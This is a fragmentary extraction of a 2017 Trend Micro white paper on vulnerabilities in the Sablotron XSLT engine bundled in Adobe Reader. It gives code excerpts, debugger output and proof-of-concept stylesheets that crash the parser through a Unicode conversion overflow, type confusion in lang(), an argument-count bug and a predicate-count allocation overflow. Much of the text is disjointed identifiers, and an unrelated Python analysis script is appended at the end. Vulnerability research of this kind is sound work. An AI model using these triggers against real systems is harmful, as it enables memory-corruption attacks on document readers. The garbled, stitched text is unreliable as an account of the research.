A Trend Micro White Paper | May 2017
Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
WRITTEN BY:
Brian Gorenc, Abdul-Aziz Hariri, and Jasiel Spelman of the Trend Micro
Zero Day Initiative
xsl:choose
xsl:attribute
xsl:copy
xsl:copy-of
Node-Set
String
Boolean
Number
<?xml version="1.0" encoding="UTF-8"?>
<catalog>
<cd>
<title>Empire Burlesque</title>
<artist>Bob Dylan</artist>
<country>USA</country>
<company>Columbia</company>
<price>10.90</price>
<year>1985</year>
</cd>
<cd>
<title>Hide your heart</title>
<artist>Bonnie Tyler</artist>
<country>UK</country>
<company>CBS Records</company>
<price>9.90</price>
<year>1988</year>
</cd>
</catalog>
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<html>
<body>
<h2>My CD Collection</h2>
<table border="1">
<tr bgcolor="#9acd32">
<th style="text-align:left">Title</th>
<th style="text-align:left">Artist</th>
</tr>
<xsl:for-each select="catalog/cd">
<tr>
<td><xsl:value-of select="title"/></td>
<td><xsl:value-of select="artist"/></td>
</tr>
</xsl:for-each>
</table>
</body>
</html>
</xsl:template>
</xsl:stylesheet>
var xmlDoc = "<x/>";
var xslDoc = "<xsl:stylesheet
xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\"
version=\"1.0\"> <xsl:template match=\"/\"> <xsl:for-each
select=\"a\">
<xsl:sort select=\"(/)/*[a()]\"/>
</xsl:for-each> </xsl:template></xsl:stylesheet>";
var x = XMLData.parse(xmlDoc, false);
var oNode = x.nodes.item(0);
oNode.applyXSL(xslDoc);
base.h enum
enum XSL_OP
{
XSL_APPLY_IMPORTS, XSL_APPLY_TEMPLATES,
XSL_ATTRIBUTE, XSL_ATTRIBUTE_SET,
XSL_CALL_TEMPLATE, XSL_CHOOSE,
XSL_COMMENT, XSL_COPY, XSL_COPY_OF,
XSL_DECIMAL_FORMAT, XSL_ELEMENT,
XSL_FALLBACK, XSL_FOR_EACH,
XSL_IF, XSL_IMPORT,
XSL_INCLUDE, XSL_KEY,
XSL_MESSAGE, XSL_NAMESPACE_ALIAS,
XSL_NUMBER, XSL_OTHERWISE,
XSL_OUTPUT, XSL_PARAM,
XSL_PRESERVE_SPACE, XSL_PROCESSING_INSTR,
XSL_SORT, XSL_STRIP_SPACE,
XSL_STYLESHEET, XSL_TEMPLATE,
XSL_TEXT, XSL_TRANSFORM,
XSL_VALUE_OF, XSL_VARIABLE,
XSL_WHEN, XSL_WITH_PARAM,
XSL_NONE
};
XSLElement
class XSLElement : public Element
{
public:
XSLElement(Tree& owner_, QName&, XSL_OP);
virtual eFlag execute(Sit S, Context *c, Bool resolvingGlobals);
virtual eFlag newChild(Sit S, Vertex*);
eFlag checkToplevel(Sit S);
virtual eFlag checkChildren(Sit S);
void checkExtraChildren(int& k);
Expression* getAttExpr(XSL_ATT);
virtual int strip();
XSL_OP op;
eFlag checkAtts(Sit S);
private:
eFlag makeSortDefs(Sit S, SortDefList &sortDefs, Context *c);
eFlag make1SortDef(Sit S, SortDef *&def, Context *c);
};
XSLElement::execute
expr.h
expr.cpp Expression::callFunc
Expression::callFunc
case EXFF_LAST:
{
checkArgsCount(0);
retxpr.setAtom( Number(c -> getSize()) );
}; break;
case EXFF_POSITION:
{
checkArgsCount(0);
retxpr.setAtom( Number(c -> getPosition() + 1) );
}; break;
case EXFF_COUNT:
{
checkArgsCount(1);
checkIsNodeset(0);
retxpr.setAtom(
Number(atoms[0] -> tonodesetRef().getSize()) );
}; break;
datastr.h
Expression::callFunc
FuncInfoItem
Expression::callFunc FuncInfoItem
xslOpNames
&forward-compatible
with-param CT_CHANGE
CT_CHANGE
namerTable
namerTable
isNamer
namerTable
namerTable isNamer
Tokenizer::tryShort isNamer
isNamer
Tokenizer::tryShort
utf8.h utf8.cpp
utf8ToUtf16
XSLElement::execute
eFlag XSLElement::execute(Sit S, Context *c, Bool resolvingGlobals)
{
Attribute *a;
Bool didNotExecute = FALSE;
Processor *proc = NZ(S.getProcessor());
…
case XSL_ATTRIBUTE:
{
QName q;
DStr nameStr;
E( NZ( atts.find(XSLA_NAME) ) -> value(S, nameStr, c) );
if (! isValidQName((char*)nameStr) )
Err1(S, E_INVALID_QNAME, (char*)nameStr);
isValueQName isValidNCName
Bool isValidQName(const char* name)
{
char *local = NULL;
char *start = NULL;
Bool copy = false;
Bool result = TRUE;
char *colon = (char *)strchr(name, ':');
if (colon)
{
//*colon = '\0';
local = colon + 1;
copy = true;
start = new char[colon - name + 1];
strncpy(start, name, colon - name);
start[colon - name] = '\0';
} else {
start = (char*)name;
}
result = isValidNCName(start) && (local == NULL ||
isValidNCName(local));
//if (colon) *colon = ':';
if (copy) delete start;
return result;
}
isValidNCName utf8ToUtf16
Bool isValidNCName(const char* name)
{
int len = utf8StrLength(name);
if (len == 0) return FALSE;
wchar_t *buff = new wchar_t[len + 1];
utf8ToUtf16(buff, name);
Utf8ToUtf16
󠁍 utf8StrLength
int utf8StrLength (const char* text)
{
int len;
for (len = 0; *text; len++) {
if (!(*text & 0x80)) text++;
else text += utf8SingleCharLength(text);
}
return len;
}
int utf8ToUtf16(wchar_t *dest, const char *src)
{
unsigned long code;
int len = 0,
thislen;
for (const char *p = src; *p; p += utf8SingleCharLength(p))
{
code = utf8CharCode(p);
if (code < 0x10000UL)
{
*dest = (wchar_t)(code);
thislen = 1;
}
else
{
dest[0] = 0xd7c0U + (code >> 10);
dest[1] = 0xdc00U | code & 0x3ff;
thislen = 2;
};
dest += thislen;
len += thislen;
}
*dest = 0;
return len;
}
xsl:attribute
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
version="1.0">
<xsl:template match="/">
<xsl:attribute name="AB󠁍DE"/>
</xsl:template>
</xsl:stylesheet>
utf8ToUtf16
utf8ToUtf16
utf8ToUtf16
base.h
#define toV(v) ((Vertex*)v)
#define toNS(v) (cast(NmSpace*,toV(v)))
#define toE(v) (cast(Element*,toV(v)))
#define toX(v) (cast(XSLElement*,toV(v)))
#define toExtension(v) (cast(ExtensionElement*,toV(v)))
#define toA(v) (cast(Attribute*,toV(v)))
#define toText(v) (cast(Text*,toV(v)))
#define toD(v) (cast(Daddy*,toV(v)))
#define toRoot(v) (cast(RootNode*,toV(v)))
#define toComment(v) (cast(Comment*,toV(v)))
#define toPI(v) (cast(ProcInstr*,toV(v)))
EXFF_LANG
Expression::callFunc
case EXFF_LANG:
{
checkArgsCount(1);
checkIsString(0);
// get the argument
Str langQuery;
E( atoms[0] -> tostring(S, langQuery) );
NodeHandle w, att = NULL;
int attCount, i;
const char* langValue = NULL;
for (w = c -> current(); w && !langValue; w = S.dom().getParent(w))
{
// find whether w has an xml:lang attribute
if (!S.domExternal(w)) {
QName searchName;
searchName.setUri(getOwnerTree().unexpand(theXMLNamespace));
searchName.setLocal(getOwnerTree().unexpand("lang"));
int idx = toE(w) -> atts.findNdx(searchName);
toE
#define toE(v) (cast(Element*,toV(v)))
toE
#ifdef _DEBUG
#define cast(TYPE,PTR) (NZ(dynamic_cast<TYPE>(PTR)))
#else
#define cast(TYPE,PTR) ((TYPE) PTR)
#endif
<a>
<abcd/>
</a>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
version="1.0">
<xsl:template match="node()">
<xsl:apply-templates select="node()[lang('foo')]"/>
</xsl:template>
</xsl:stylesheet>
__RTDynamicCast
Figure 6 - Patch Details
ExprList
#define checkArgsCount(x) if (atomsNumber != x)\
Err(S, ET_BAD_ARGS_N);
#define checkArgsCountMax(x) if (atomsNumber > x)\
Err(S, ET_BAD_ARGS_N);
#define checkArgsCountMin(x) if (atomsNumber < x)\
Err(S, ET_BAD_ARGS_N);
#define checkArgsCountBetween(x,y) if ((atomsNumber < x) || \
(atomsNumber > y)) Err(S, ET_BAD_ARGS_N);
CheckArgsCount
ExprList ExprList
PList Expressions
ExprList
typedef PList<Expression *> ExprList;
template <class T>
class PList : public List<T>
{
public:
PList(int logBlocksize_ = LIST_SIZE_SMALL);
// free and remove the last pointer
void freelast(Bool);
// free and remove all pointers
void freeall(Bool);
// free and remove the given pointer
void freerm(int, Bool);
};
#define checkArgsCount(x) if (atomsNumber != x)\
Err(S, ET_BAD_ARGS_N);
#define checkArgsCountMax(x) if (atomsNumber > x)\
Err(S, ET_BAD_ARGS_N);
#define checkArgsCountMin(x) if (atomsNumber < x)\
Err(S, ET_BAD_ARGS_N);
#define checkArgsCountBetween(x,y) if ((atomsNumber < x) || \
(atomsNumber > y)) Err(S, ET_BAD_ARGS_N);
case EXFF_CONTAINS:
{
checkArgsCount(2); //Check if there's two args
checkIsString2(0,1);
Str a0Str, a1Str;
E( atoms[0] -> tostring(S, a0Str) ); //reference arg1
E( atoms[1] -> tostring(S, a1Str) ); //reference arg2
retxpr.setAtom((Bool) (firstOccurence(
a0Str, a1Str) != -1));
}; break;
EXFF_SUBSTRING_BEFORE
EXFF_SUBSTRING_AFTER
case EXFF_SUBSTRING_BEFORE:
case EXFF_SUBSTRING_AFTER:
{
Str strg;
Str theBigger, theSmaller;
E( atoms[0] -> tostring(S, theBigger) );
E( atoms[1] -> tostring(S, theSmaller) );
checkArgsCount(2);
checkIsString2(0,1);
...
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
version="1.0">
<xsl:template match="/">
<xsl:value-of select="substring-after(.)"/>
</xsl:template>
</xsl:stylesheet>
./sabcmd input.xsl input.xml
Expression::callFunc
atomsNumber
atomsNumber atoms
cmp 0x100261A8 tostring
atoms
Expression::eval()
eFlag Expression::eval(Sit S, Expression &retxpr, Context *c, Bool
resolvingGlobals /* = FALSE */){
EXFO_LOCPATH
case EXF_LOCPATH:
case EXFO_UNION:
{
sabassert(c && "context is null!");
newc.assign(c);
E( createContext(S, newc) );
newc.unkeep();
// assign newc directly without copying
retxpr.setAtom((*newc).copy());
newc.del();
}; break;
…
createContext()
eFlag Expression::createContext(Sit S, Context *& c, int baseNdx /* = -1
*/)
case EXF_LOCPATH:
{
E( createLPContext(S, newc, baseNdx) );
newc.unkeep();
}
createLPContextLevel()
eFlag Expression::createLPContextLevel(Sit S,
int stepLevel, int stepsCount, NodeHandle base,
Context &info, Context *theResult)
{
sabassert(functor == EXF_LOCPATH);
int i, j, init,
predsCount = args[stepLevel] -> step -> preds.number(),
lastBad = -1; // last bad predicate, or the step itself
// keep a stack of positions, one for each predicate IN THIS STEP
List<int> reached(predsCount), // serves as position for next pred
totalReached(predsCount); // serves as size for next (bad) pred
// there will be as many dry (size-counting) runs as there are bad preds
Bool dryRun = TRUE,
quitThisRound = FALSE, quitThisVertex = FALSE;
// i ranges over predicates. Value i==predsCount is the special last run
for (i = 0; i <= predsCount; i++)
{
if (i == predsCount)
// the last run, not a dry-run
dryRun = FALSE;
// if this is the last run, or if the current pred uses last(), compute
// the context size
if (!dryRun || args[stepLevel] -> step -> preds[i] -> usesLast)
{
// initialize the size arrays:
// append base values for preds past the last bad one,
// up to this bad one (incl.)
for (init = 0; init <= lastBad; init++)
reached[init] = 0;
for (init = lastBad + 1; init <= i; init++)
{
reached.append(0);
totalReached.append(-1); // -1 just for safety
};
..
} // if bad predicate
} // for, over all preds
return OK;
}
select="A[0][1][2][3][4][5][6][7][8][9][0][1][2][3][4][5][6][7][8][9][0][1][2][3][4][5][6][7][8][9]"
predsCount
predsCount dryRun
for (init = 0; init <= lastBad; init++)
reached[init] = 0;
for (init = lastBad + 1; init <= i; init++)
{
reached.append(0);
totalReached.append(-1); // -1 just for safety
};
(gdb) p reached
$30 = {_vptr.List = 0xb69e9228 <vtable for List<int>+8>, nItems = 0, block = 0x0, blocksize = 0, origBlocksize = 1073741824}
(gdb) p/x reached.origBlocksize
$32 = 0x40000000
reached.append(0)
reached
3711 List<int> reached(predsCount), // serves as position for next pred
3712 totalReached(predsCount); // serves as size for next (bad) pred
(gdb) s
3735 reached.append(0);
(gdb) s
List<int>::append (this=0xbfffcc20, what=0) at datastr.h:610
if (nItems >= blocksize)
List<int>::append() datastr.h
template <class T>
void List<T>::append(T what)
{
if (nItems >= blocksize)
{
if (block)
grow();
else
{
blocksize = origBlocksize;
block = (T*) claimMemory(blocksize * sizeof(T));
// FIXME: asserting memory request ok
sabassert(block);
}
}
block[nItems++] = what;
};
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
version="1.0">
<xsl:template match="/">
<xsl:value-of
select="A[0][1][2][3][4][5][6][7][8][9][0][1][2][3][4][5][6][7][8][9][0][1][2][3][4][5][6][7][8][9]"/>
</xsl:template>
</xsl:stylesheet>
./sabcmd input.xsl input.xml
In order to find the vulnerable function, we’ll need to find createLPContext which in turn calls createLPContextLevel. This function contains two calls to the List constructor:
origBlockSize
guard.h
Expression::createContext newc
EXF_FILTER
case EXF_FILTER:
{
sabassert(baseNdx != -1); // meaningful only for a locpath
NodeHandle wasCurrent = (*newc).getCurrentNode();
E( args[0] -> createContext(S, newc, baseNdx) );
newc.unkeep();
(*newc).setCurrentNode(wasCurrent);
GP( Context ) filteredc;
for (i = 1; i < argsNumber - (int) hasPath; i++)
{
filteredc = new Context(c_orig -> getCurrentNode());
(*newc).reset();
Bool istrue;
int newcNumber = (*newc).getSize();
for (j = 0; j < newcNumber; j++)
{
E(args[i] -> trueFor(S, newc, istrue));
if (istrue)
(*filteredc).append((*newc)[j]);
(*newc).shift();
};
newc.del();
newc = filteredc.keep();
if (!(*newc).getSize()) break;
};
if (hasPath)
{
filteredc.assign(newc);
filteredc = newc; // a patch due to SGI MIPSpro compiler
E( args[argsNumber-1] -> createLPContextSum(S, filteredc,
(*newc).getCurrentNode()) );
newc.del();
newc = filteredc.keep();
}
}
break;
if(hasPath) filteredc newc
filteredc newc
createLPContextSum createLPContextSum
createLPContext createLPContextLevel
createLPContextLevel trueFor
Expression::trueFor eval
eval EXFOTHERFUNC Err1
Err1 report() NOT_OK
newc filteredc
Expression::createContext
Err1
```xml
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
                version="1.0">
  <xsl:template match="/">
    <xsl:for-each select="a">
      <xsl:sort select="(/)/*[a()]"/>
    </xsl:for-each>
  </xsl:template>
</xsl:stylesheet>
```

```
./sabcmd input.xsl input.xml
```
Comparing the version numbers of AXSLE.dll with those of Adobe Reader makes it apparent that Reader's version numbers increment at a different rate than AXSLE's. It is hypothesized that the AXSLE version changes only because of security fixes: no new functionality is seen in the AXSLE versions that increment, even across major version changes to Reader.
| Adobe Reader Major Version | Minor Version | AXSLE Version |
|---|---|---|
| 9 | 9.0.0 | 3.4.102.1 |
| | 9.1.0 | 3.4.102.1 |
| | 9.1.1 | 3.4.102.1 |
| | 9.1.2 | 3.4.102.1 |
| | 9.1.3 | 3.4.102.1 |
| | 9.2 | 3.4.102.1 |
| | 9.3 | 3.4.102.1 |
| | 9.3.1 | 3.4.102.1 |
| | 9.3.2 | 3.4.102.1 |
| | 9.3.3 | 3.4.102.1 |
| | 9.3.4 | 3.4.102.1 |
| | 9.4.0 | 3.4.102.1 |
| | 9.4.1 | 3.4.102.1 |
| | 9.4.2 | 3.4.102.1 |
| | 9.4.3 | 3.4.102.1 |
| | 9.4.4 | 3.4.102.1 |
| | 9.4.5 | 3.4.102.1 |
| | 9.4.6 | 3.4.102.1 |
| | 9.4.7 | 3.4.102.1 |
| | 9.5 | 3.4.102.1 |
| | 9.5.1 | 3.4.102.1 |
| | 9.5.2 | 3.4.502.1 |
| | 9.5.3 | 3.4.503.1 |
| | 9.5.4 | 3.4.503.1 |
| | 9.5.5 | 3.4.503.1 |
| 10 | 10.0.0 | 3.6.102.10630 |
| | 10.0.1 | 3.6.102.10630 |
| | 10.1.0 | 3.6.102.10630 |
| | 10.1.1 | 3.6.102.10630 |
| | 10.1.2 | 3.6.102.10630 |
| | 10.1.3 | 3.6.102.10630 |
| | 10.1.4 | 3.6.502.20973 |
| | 10.1.5 | 3.6.502.26194 |
| | 10.1.6 | 3.6.502.26194 |
| | 10.1.7 | 3.6.502.26194 |
| | 10.1.8 | 3.6.502.26194 |
| | 10.1.9 | 3.6.502.26194 |
| | 10.1.10 | 3.6.502.26194 |
| | 10.1.11 | 3.6.502.26194 |
| | 10.1.12 | 3.6.502.26194 |
| | 10.1.13 | 3.6.502.26194 |
| | 10.1.14 | 3.6.502.26194 |
| | 10.1.15 | 3.6.502.26194 |
| | 10.1.16 | 3.6.502.26194 |
| 11 | 11.0.0 | 3.7.101.21186 |
| | 11.0.01 | 3.7.101.21186 |
| | 11.0.02 | 3.7.101.21186 |
| | 11.0.03 | 3.7.101.21186 |
| | 11.0.04 | 3.7.101.21186 |
| | 11.0.05 | 3.7.101.21186 |
| | 11.0.06 | 3.7.101.21186 |
| | 11.0.07 | 3.7.101.21186 |
| | 11.0.08 | 3.7.101.21186 |
| | 11.0.09 | 3.7.101.21186 |
| | 11.0.10 | 3.7.101.21186 |
| | 11.0.11 | 3.7.101.21186 |
| | 11.0.12 | 3.7.101.21186 |
| | 11.0.13 | 3.7.101.21186 |
| | 11.0.14 | 3.7.101.21186 |
| | 11.0.15 | 3.7.101.21186 |
| | 11.0.16 | 3.7.101.21186 |
| | 11.0.17 | 3.7.101.36545 |
| | 11.0.18 | 3.7.101.37153 |
| | 11.0.19 | 3.7.101.37637 |
| | 11.0.20 | 3.7.101.37991 |
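
The comparison made in the paragraph above the table can be checked mechanically. The following is an added example, not part of the white paper: it reduces the table's pairs to the Reader releases at which the bundled AXSLE version changed. The function names `axsle_changes` and `per_major` are illustrative; the pairs are transcribed from the table.

```python
# Added example: which Reader releases shipped a changed AXSLE.dll version.
# TABLE holds "Reader-release AXSLE-version" pairs transcribed from the table above.
TABLE = """
9.0.0 3.4.102.1  9.1.0 3.4.102.1  9.1.1 3.4.102.1  9.1.2 3.4.102.1  9.1.3 3.4.102.1
9.2 3.4.102.1  9.3 3.4.102.1  9.3.1 3.4.102.1  9.3.2 3.4.102.1  9.3.3 3.4.102.1
9.3.4 3.4.102.1  9.4.0 3.4.102.1  9.4.1 3.4.102.1  9.4.2 3.4.102.1  9.4.3 3.4.102.1
9.4.4 3.4.102.1  9.4.5 3.4.102.1  9.4.6 3.4.102.1  9.4.7 3.4.102.1  9.5 3.4.102.1
9.5.1 3.4.102.1  9.5.2 3.4.502.1  9.5.3 3.4.503.1  9.5.4 3.4.503.1  9.5.5 3.4.503.1
10.0.0 3.6.102.10630  10.0.1 3.6.102.10630  10.1.0 3.6.102.10630  10.1.1 3.6.102.10630
10.1.2 3.6.102.10630  10.1.3 3.6.102.10630  10.1.4 3.6.502.20973  10.1.5 3.6.502.26194
10.1.6 3.6.502.26194  10.1.7 3.6.502.26194  10.1.8 3.6.502.26194  10.1.9 3.6.502.26194
10.1.10 3.6.502.26194  10.1.11 3.6.502.26194  10.1.12 3.6.502.26194  10.1.13 3.6.502.26194
10.1.14 3.6.502.26194  10.1.15 3.6.502.26194  10.1.16 3.6.502.26194
11.0.0 3.7.101.21186  11.0.01 3.7.101.21186  11.0.02 3.7.101.21186  11.0.03 3.7.101.21186
11.0.04 3.7.101.21186  11.0.05 3.7.101.21186  11.0.06 3.7.101.21186  11.0.07 3.7.101.21186
11.0.08 3.7.101.21186  11.0.09 3.7.101.21186  11.0.10 3.7.101.21186  11.0.11 3.7.101.21186
11.0.12 3.7.101.21186  11.0.13 3.7.101.21186  11.0.14 3.7.101.21186  11.0.15 3.7.101.21186
11.0.16 3.7.101.21186  11.0.17 3.7.101.36545  11.0.18 3.7.101.37153  11.0.19 3.7.101.37637
11.0.20 3.7.101.37991
"""
tokens = TABLE.split()
PAIRS = list(zip(tokens[0::2], tokens[1::2]))  # [(reader, axsle), ...] in release order

def axsle_changes(pairs):
    """Releases whose AXSLE version differs from the previous release of the
    same Reader major line, as (reader, previous_axsle, new_axsle)."""
    changes, prev_major, prev_axsle = [], None, None
    for reader, axsle in pairs:
        major = reader.split(".")[0]
        if major == prev_major and axsle != prev_axsle:
            changes.append((reader, prev_axsle, axsle))
        prev_major, prev_axsle = major, axsle
    return changes

def per_major(pairs):
    """Map Reader major version -> (release count, distinct AXSLE versions)."""
    seen = {}
    for reader, axsle in pairs:
        seen.setdefault(reader.split(".")[0], []).append(axsle)
    return {m: (len(v), len(set(v))) for m, v in seen.items()}

if __name__ == "__main__":
    for reader, old, new in axsle_changes(PAIRS):
        print(f"Reader {reader}: AXSLE {old} -> {new}")
    print(per_major(PAIRS))
```

Across the 65 listed Reader releases the AXSLE version changes only eight times within a major line, which is the mismatch in increment rate the text describes.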